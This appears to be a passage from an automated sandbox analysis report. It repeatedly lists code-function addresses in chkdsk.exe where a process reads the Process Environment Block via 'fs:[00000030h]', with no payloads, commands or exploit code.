          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D976E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E046A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D858EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D85210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB03E2 mov eax, dword ptr fs:[00000030h]
